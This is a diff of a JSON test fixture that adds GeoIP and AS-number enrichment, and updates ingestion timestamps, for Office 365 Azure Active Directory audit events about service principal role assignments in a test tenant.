-1068,6 +1140,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1234,7 +1318,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124859400Z", + "ingested": "2021-12-14T14:48:43.176638575Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -1261,6 +1345,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1427,7 +1523,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124866Z", + "ingested": "2021-12-14T14:48:43.176639327Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -1454,6 +1550,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1620,7 +1728,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124872700Z", + "ingested": "2021-12-14T14:48:43.176639956Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -1647,6 +1755,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1813,7 +1933,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124879300Z", + "ingested": "2021-12-14T14:48:43.176640683Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -1840,6 +1960,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": 